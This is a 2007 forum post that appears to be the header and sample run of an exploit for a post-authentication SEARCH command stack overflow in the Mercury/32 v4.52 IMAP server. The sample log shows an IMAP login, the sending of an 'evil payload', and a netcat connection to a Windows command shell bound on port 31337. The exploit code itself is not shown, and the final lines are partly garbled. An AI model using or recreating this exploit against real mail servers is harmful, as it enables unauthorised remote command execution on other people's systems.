nullbyte
Posted September 19, 2007

# Z:\Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org
# Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit
# Found & Code by void# ph4nt0m.org
#
# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready.
# C: pst06 LOGIN void ph4nt0m.org
# S: pst06 OK LOGIN completed.
# C: pst06 SELECT INBOX
# S: * 0 EXISTS
# S: * 0 RECENT
# S: * FLAGS (\Deleted \Draft \Seen \Answered)
# S: * OK [UIDVALIDITY 1190225819] UID Validity
# S: * OK [UIDNEXT 1] Predicted next UID
# S: * OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flag
# s
# S: pst06 OK [READ-WRITE] SELECT completed.
# [*] Send Evil Payload ...
# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck
#
# Z:\Exp>nc -vv 127.0.0.1 31337
# DNS fwd/rev mismatch: localhost != GNU
# localhost [127.0.0.1] 31337 (?) open
# Microsoft Windows XP [°? 5.1.2600]
# © °